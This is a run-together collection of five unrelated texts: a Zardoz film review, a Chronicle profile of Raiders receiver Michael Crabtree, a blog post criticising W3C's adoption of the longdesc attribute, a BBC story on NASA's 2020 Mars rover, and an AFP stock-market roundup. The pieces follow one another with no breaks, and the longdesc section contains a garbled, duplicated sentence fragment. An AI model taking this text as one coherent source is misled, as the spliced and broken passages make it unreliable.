Directed by master director John Boorman (Deliverance, Excalibur) and staring Sean Connery of James Bond fame, Zardoz is a film that every single film fan on the planet needs to at least experience once. Set in a dystopian society (The 1970s seems to love that setting), a savage that is only trained to kill, finds his way into a society of immortal beings that preserve the history of mankind. Also in this world killing is considered good and reproducing is considered to be the worst sin and God speaks through a large stone statue of a head( not making this up). Yeah this film is weird, really weird, but done in a way that makes it so excellent. The setting could only be described as a mixture of dystopian science fiction and a high fever dream and this fusion makes the film so memorable, creative and entertaining. Filled with messages and great visuals, Zardoz is a film that deserves to be up there with greats such as Star Wars, Blade Runner, and 2001. Plus you get to see Sean Connery run around in a read diaper!!!
He came to Oakland with a lot of labels, and though Michael Crabtree might have surprised most people by how well he is playing for the Raiders, there is one East Bay observer who predicted that the former 49ers receiver would have a career year.
Cal head coach Sonny Dykes recruited Crabtree when he was the receivers coach at Texas Tech, and he had to fight to get him. He had to out-sell someone from his own school: basketball coach Bobby Knight.
“He was a special talent on the basketball court,” Dykes said. “He could do everything. He could shoot, incredible athlete. And he was highly, highly, highly competitive. That was probably the best thing about Mike is that he competed incredibly hard all the time.”
Though Crabtree was labeled as aloof and a diva during his six years with San Francisco, Raiders coaches and players have seen nothing but what Dykes saw: a hard-hat who punches in, leads by example and helps teammates — like rookie wideout Amari Cooper — get better.
All while being particularly productive.
Crabtree has 40 catches for 483 yards and three touchdowns. That's a career-high pace for the 28-year-old, who had 85 catches for 1,105 yards for the 49ers in 2012.
“I just do what I have to do,” he said. “I let all the talk, they can just keep talking. But when you turn that film on, you can see some guys getting after it. All I know is go do what you're supposed to do and the film will show it.”
The surprising Raiders (4-3) aren't much on talk, and some players appreciate Crabtree more for how dogged he is at blocking for running backs than for what he brings to the passing game.
“Watch Michael Crabtree block on the edges,” tight end Lee Smith told 95.7 FM. “Just watch that for one game and that will show how dedicated this team is to having each other's backs.”
The Raiders didn't know Crabtree would be this good, on the field or in the locker room, when they signed him to a one-year deal in April. But as head coach Jack Del Rio said, they didn't know he wouldn't be, either.
“What we do is we start with a blank slate,” Del Rio said. “Guys have an opportunity to express themselves and make their mark here. We're not dragging anything in the past — good or bad — forward.
“He's been a great teammate. We ask them to bring us whatever leadership skills they have. He's done a great job expressing that.”
Crabtree has made coaches and young teammates notice his examples all season, from being the first receiver to accept quarterback Derek Carr's invitation to a summer workout in Bakersfield, to coming back in the game and playing hurt Week 4 at Chicago, to his blocking, to running through tacklers on Sunday's 36-yard touchdown against the Jets.
“He's giving it up, just like in Chicago when he battled his way back out onto the field,” Del Rio said. “His ankle was — that was a pretty good shot he took and he fought his way back into the game and played well. So when you get an example of guys doing that — Charles Woodson — guys that are playing with toughness, playing through things, doing it for their teammates, that's a great message for all our players.”
Cooper, in a two-man race with St. Louis running back Todd Gurley for Rookie of the Year, called Crabtree “a mentor.”
“He's showed me different ways to get open, how you beat certain coverages, how to use your hands,” Cooper said.
Crabtree calls Cooper his little brother and said his leadership role is no big deal.
“I feel like that's what I'm supposed to do,” he said. “The knowledge I've gained over the years, seven years in, I've done seen it all. NFC championships, postseason stats … but they don't talk about that.”
Crabtree has been soaking in the knowledge ever since Dykes started recruiting a 6-foot-1 high school quarterback out of Dallas and telling him he could be a great receiver.
“Mike always wanted the ball in his hands,” Dykes said.
Crabtree has big hands, some of the best in the game, and they work well with the rest of his body.
“He's got great concentration. He was able to focus on catching the ball despite getting hit, despite distractions, tipped balls, all that stuff,” Dykes said. “What he had as well was great body control. Could really adjust to balls, whether they were thrown low, behind him. He could really contort his body and get his hands in position to give himself an opportunity to catch the ball.”
Dykes thought the transition to receiver would take about a year.
“It took a month,” Dykes said. “He picked up all the nuances really quickly. He's a really smart guy.”
Back to Gallery Raiders' Michael Crabtree adapts, leads and succeeds 2 1 of 2 Photos: Scott Strazzante, The Chronicle 2 of 2 Photos: Scott Strazzante, The Chronicle
The transition to the Raiders was similarly smooth. Crabtree was a little hurt by the lack of interest on the free-agent market in the spring, and friends said he had something to prove.
He'll be much more in demand, if he continues his current pace, in free agency next year. But, as Dykes said, Crabtree is a smart guy and there is no reason to talk about that stuff in November.
So, when a reporter asked after the game if Crabtree has thought about what he'll do after this season, Crabtree treated him like a Jet.
“Naw, one game at a time,” he said. “Y'all are going too far. We still got nine games left, right?”
Yes, the rest of the season remains, one that his teammates hope is full of more Crabtree touchdowns, blocks, examples and playoffs-targeted wins.
“I would love ‘Crab' to be here for a long time,” Carr said.
Chronicle columnist Scott Ostler contributed to this report.
Vic Tafur is a San Francisco Chronicle staff writer. E-mail: vtafur@sfchronicle.com Twitter: @VicTafur
W3C has advanced the longdesc attribute to a Recommendation, overruling objections from browser makers.
Not a single browser vendor supported advancing this specification to recommendation.
Apple formally objected when it was a Candidate Recommendation and provided lengthy research and documentation (better than anyone has before or since) on why longdesc is bad technology (in practice has not and does not solve the problems it claims to).
Mozilla formally objected when it was a Proposed Recommendation, agreeing with Apple's research and reasoning.
Both formal objections were overruled.
For all the detailed reasons noted in Apple's formal objection, I also recommend avoid using longdesc, and instead:
Always provide good alt (text alternative) attributes for images, that read well inline if and when the image does not load. Or if there's no semantic loss without the image, use an empty alt="" .
(text alternative) attributes for images, that read well inline if and when the image does not load. Or if there's no semantic loss without the image, use an empty . For particularly rich or complex images, either provide longer descriptions of images in normal visible markup, or linked from a image caption or other visible affordance. See accessibility expert James Craig's excellent Longdesc alternatives in HTML5 resource for even more and better techniques.
Perhaps the real tragedy is that many years have been wasted on a broken technology that could have been spent on actually improving accessibility of open web technologies. Not to mention the harrassment that's occurred in the name of longdesc.
Sometimes web standards go wrong. This is one of those times.
Image copyright NASA/JPL-CALTECH/MSSS Image caption Curiosity landed in Gale Crater four months ago
The US space agency (Nasa) says it will launch a new rover to Mars in 2020.
The vehicle will be based on its Curiosity robot, which landed on the Red Planet in August.
Nasa expects to re-use many of the technologies that worked so successfully in getting the one-tonne spacecraft down into the huge equatorial bowl known as Gale Crater.
This included a rocket-powered crane that lowered Curiosity to the surface on nylon cords.
The announcement of a follow-up robot was made here at the American Geophysical Union (AGU) Fall Meeting, the world's largest annual gathering for Earth and planetary scientists, and a major showcase for Nasa-led research.
It was communicated by the agency's associate administrator for science, John Grunsfeld.
"The new rover's going to be based on the [Curiosity] chassis, and it's really building on the tremendous success of the engineering of Curiosity," he said.
"It will have new instruments. We're going to put out a letter to colleagues to ask for folks who want to be in the science definition team. And the idea is to work through the winter and spring, and have an announcement of opportunity [in] mid-summer for actual instruments, because while 2020 might seem a long way off, it's really not. Curiosity was about a decade in the works."
Nasa's budget for planetary science, and Mars research in particular, has been squeezed of late, forcing the Americans to pull back on their commitments to two European Red Planet ventures in 2016 and 2018. But Mr Grunsfeld said there was scope in the financial outlook for a major mission at the end of the decade.
Media playback is unsupported on your device Media caption Nasa's John Grunsfeld speaks to Jonathan Amos about future missions to Mars
Critical to its affordability will be the intention to re-use the Curiosity template.
The 2020 rover will share many aspects of its design with the current robot, most notably its novel entry, descent and landing (EDL) system.
This included a hovering "skycrane" that was able to put Curiosity down with pin-point accuracy in Gale Crater.
The agency also has a collection of spare parts left over from the build of Curiosity. Among This is a spare nuclear battery.
"That will become the prime for the 2020 mission, and there was an engineering test unit that we will now try to upgrade to a back-up," Mr Grunsfeld said.
The budget for the 2020 vehicle will be about $1.5bn (at 2015 prices) compared with the $2.5bn quoted for the cost of Curiosity at launch last year.
John Grunsfeld has already discussed the mission with his opposite number at the European Space Agency - Alvaro Gimenez Canete - who he said was excited about the possibility of participating in the project.
"It will be an international mission as all our missions are," the former astronaut added.
Curiosity landed on Mars on 6 August. It is investigating Gale for signs that past environments could have supported microbial life.
Its major discovery so far is the realisation that it touched down in an ancient river-bed system where water once flowed, perhaps waist deep.
Given the longevity of Curiosity's nuclear battery, there is every expectation that it will still be operating when its near-copy arrives in 2021.
Image copyright NASA
(A) Curiosity will trundle around its landing site looking for interesting rock features to study. Its top speed is about 4cm/s
(B) This mission has 17 cameras. They will identify particular targets, and a laser will zap those rocks to probe their chemistry
(C) If the signal is significant, Curiosity will swing over instruments on its arm for close-up investigation. These include a microscope
(D) Samples drilled from rock, or scooped from the soil, can be delivered to two hi-tech analysis labs inside the rover body
(E) The results are sent to Earth through antennas on the rover deck. Return commands tell the rover where it should drive next
Jonathan.Amos-INTERNET@bbc.co.uk and follow me on Twitter: @BBCAmos
New York (AFP) – Wall Street stocks surged to fresh records Friday and boosted other equity markets after US lawmakers took a key step toward enacting the tax reform plan sought by President Donald Trump.
Investors were cheered by a party-line 51-49 vote in the Senate for a federal budget plan that permits the legislative body to pass the tax cut plan with a simple majority vote instead of a 60-person supermajority.
That lifted all three major US indices to records, with the Dow Jones Industrial Average rising 0.7 percent to 23,328.63.
“Optimism over some form of tax reform in the US has waxed and waned constantly since the beginning of the year, and while there still remains some way to go before a plan passes the house, the fact that some progress on a blueprint has taken place, can be seen as progress,” said Michael Hewson, chief market analyst at CMC Markets UK.
The news also boosted the dollar against other currencies, as the Senate vote “brought the Trump administration a step closer to advancing tax reform, a core tenet of the president's agenda aimed at helping the economy shift into a higher gear that has long proven elusive,” said Western Union Business Solutions analyst Joseph Manimbo.
While the controversial proposals still have a long way to go before being passed, the news spurred Asian markets to life Friday after a plodding start to the day.
The Nikkei 225 inched up 0.04 percent to end at 21,457.64 points, rising for the 14th day straight to match a record set in 1961.
In Europe, EU leaders agreed to start preparations for the next stage of negotiations with Britain over Brexit.
As expected, the other 27 leaders agreed there had been insufficient progress on the divorce talks to officially move on to the future relationship with Britain, but still approved the start of internal preparations for post-Brexit trade and a transition deal.
“We also saw a slightly more positive tone out of Brussels with respect to the Brexit talks after German Chancellor Angela Merkel acknowledged that the EU side also needed to move on its negotiating position in the Brexit talks,” said Hewson.
“What also appeared to be significant was an admission by Donald Tusk that the separate internal EU27 talks on trade would take UK proposals into account,” he added.
Bourses in London, Paris and Frankfurt ended little changed.
Meanwhile, Spain's IBEX 35 index added 0.3 percent, although tensions over Catalonia still ran high as Madrid prepared to seize powers from the regional government.
– Key figures around 2100 GMT –
New York – DOW: UP 0.7 percent at 23,328.63 (close)
New York – S&P 500: UP 0.5 percent at 2,575.21 (close)
New York – Nasdaq: UP 0.4 percent at 6,629.05 (close)
London – FTSE 100: FLAT at 7,523.23 points (close)
Frankfurt – DAX 30: FLAT at 12,991.28 (close)
Paris – CAC 40: UP 0.1 percent at 5,372.38 (close)
Madrid – IBEX 35: UP 0.3 at 10,222.7 (close)
EURO STOXX 50: UP 0.1 percent at 3,604.27
Tokyo – Nikkei 225: FLAT at 21,457.64 (close)
Hong Kong – Hang Seng: UP 1.2 percent at 28,487.24 (close)
Shanghai – Composite: UP 0.3 percent at 3,378.65 (close)
Euro/dollar: DOWN at $1.1781 from $1.1854 at 2100 GMT
Pound/dollar: UP at $1.3189 from $1.3153
Dollar/yen: UP at 113.51 yen from 112.56 yen
Oil – Brent North Sea: UP 52 cents at $57.75 per barrel
Oil – West Texas Intermediate: UP 18 cents at $51.47 per barrel
burs-jmb/oh
